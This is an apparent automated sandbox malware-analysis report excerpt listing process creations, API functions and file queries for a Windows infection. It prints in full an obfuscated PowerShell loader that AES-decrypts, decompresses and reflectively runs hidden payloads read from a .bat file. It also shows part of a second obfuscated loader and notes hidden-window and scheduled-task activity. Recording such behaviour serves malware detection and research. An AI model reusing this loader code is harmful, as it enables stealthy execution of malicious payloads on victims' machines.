Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{3837e362-e74e-494b-bcc5-affaf78d43c0}

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\users\user\desktop\1.cmd';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:amvxseuhmbvc{param([outputtype([type])][parameter(position=0)][type[]]$uiloijomlvxjkf,[parameter(position=1)][type]$qydjyvedmn)$nmmwpnxadvf=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+'r'+''+[char](101)+''+'f'+'l'+[char](101)+''+[char](99)+'t'+[char](101)+''+'d'+''+[char](68)+''+[char](101)+''+[char](108)+'e'+[char](103)+''+[char](97)+'t'+[char](101)+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+[char](73)+'n'+[char](77)+''+[char](101)+'m'+[char](111)+''+[char](114)+''+'y'+''+[char](77)+''+'o'+''+[char](100)+'u'+[char](108)+'e',$false).definetype('m'+[char](121)+'d'+[char](101)+''+[char](108)+''+[char](101)+''+[char](103)+''+[char](97)+''+[char](116)+''+[char](101)+''+[char](84)+'y'+[char](112)+'e',''+'c'+''+[char](108)+''+'a'+''+[char](115)+''+'s'+''+[char](44)+''+[char](80)+'ub'+'l'+'i'+[char](99)+','+[char](83)+''+[char](101)+'a'+'l'+''+[char](101)+'d'+[char](44)+'an'+[char](115)+'icla'+'s'+''+[char](115)+','+[char](65)+''+[char](117)+'t'+[char](111)+''+[char](67)+''+'l'+'as'+[char](115)+'',[multicastdelegate]);$nmmwpnxadvf.defineconstructor('r'+[char](84)+'s'+'p'+''+'e'+''+'c'+''+[char](105)+''+[char](97)+''+[char](108)+''+[char](78)+''+'a'+''+'m'+''+[char](101)+''+[char](44)+''+[char](72)+''+[char](105)+'d'+[char](101)+''+[char](66)+''+[char](121)+'si'+'g'+','+[char](80)+''+[char](117)+'b'+[char](108)+''+'i'+'c',[reflection.callingconventions]::standard,$uiloijomlvxjkf).setimplementationflags('ru'+[char](110)+''+[char](116)+'i'+[char](109)+''+[char](101)+','+'m'+''+[char](97)+''+[char](110)+''+'a'+''+[char](103)+''+[char](101)+''+[char](100)+'');$nmmwpnxadvf.definemethod(''+'i'+''+[char](110)+'v'+'o'+''+[char](107)+'e',''+[char](80)+''+[char](117)+''+[char](98)+''+[char](108)+''+'i'+''+'c'+''+[char](44)+'h'+'i'+'d'+[char](101)+''+[char](66)+'y'+[char](83)+''+[char](105)+''+[char](103)+''+','+''+[char](78)+''+[char](101)+''+[char](119)+'slo'+'t'+','+[char](86)+''+[char](105)+''+[char](114)+''+'t'+''+[char](117)+''+'a'+'l',$qydjyvedmn,$uiloijomlvxjkf).setimplementationflags(''+'r'+'u'+[char](110)+''+'t'+''+'i'+''+[char](109)+''+[char](101)+''+[char](44)+''+[char](77)+''+[char](97)+''+'n'+''+[char](97)+''+[char](103)+''+[char](101)+''+'d'+'');write-output $nmmwpnxadvf.createtype();}$swnyxvukgpflw=([appdomain]::currentdomain.getassemblies()\|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+[char](83)+''+[char](121)+''+'s'+'t'+'e'+''+[char](109)+''+'.'+'d'+'l'+''+'l'+'')}).gettype(''+[char](77)+''+[char](105)+''+'c'+'r'+[char](111)+''+[char](115)+''+[char](111)+''+[char](102)+'t.'+[char](87)+'i'+'n'+''+'3'+''+[char](50)+'.'+'u'+'n'+[char](115)+''+[char](97)+''+'f'+''+'e'+''+[char](78)+''+'a'+''+'t'+''+[char](105)+''+'v'+''+[char](101)+''+[char](77)+''+'e'+''+[char](116)+''+'h'+'o'+[char](100)+'s');$amujszcronxavl=$swny
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\users\user\desktop\1.cmd';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));	Jump to behavior

Source: C:\Windows\System32\dllhost.exe

Code function: 38_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

38_2_0000000140002300

Source: C:\Windows\System32\dllhost.exe

Code function: 38_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

38_2_0000000140002300

Source: dwm.exe, 0000002A.00000002.3081128578.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000002A.00000000.2467392240.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: conhost.exe, 00000014.00000002.3002498113.000002BCD5CC0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001A.00000002.3053496232.000002123BAB0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3026965971.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000014.00000002.3002498113.000002BCD5CC0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001A.00000002.3053496232.000002123BAB0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3026965971.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: conhost.exe, 00000014.00000002.3002498113.000002BCD5CC0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001A.00000002.3053496232.000002123BAB0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3026965971.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: conhost.exe, 00000014.00000002.3002498113.000002BCD5CC0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001A.00000002.3053496232.000002123BAB0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3026965971.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\System32\cmd.exe

Code function: 19_3_00000224138E2AF0 cpuid

19_3_00000224138E2AF0

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
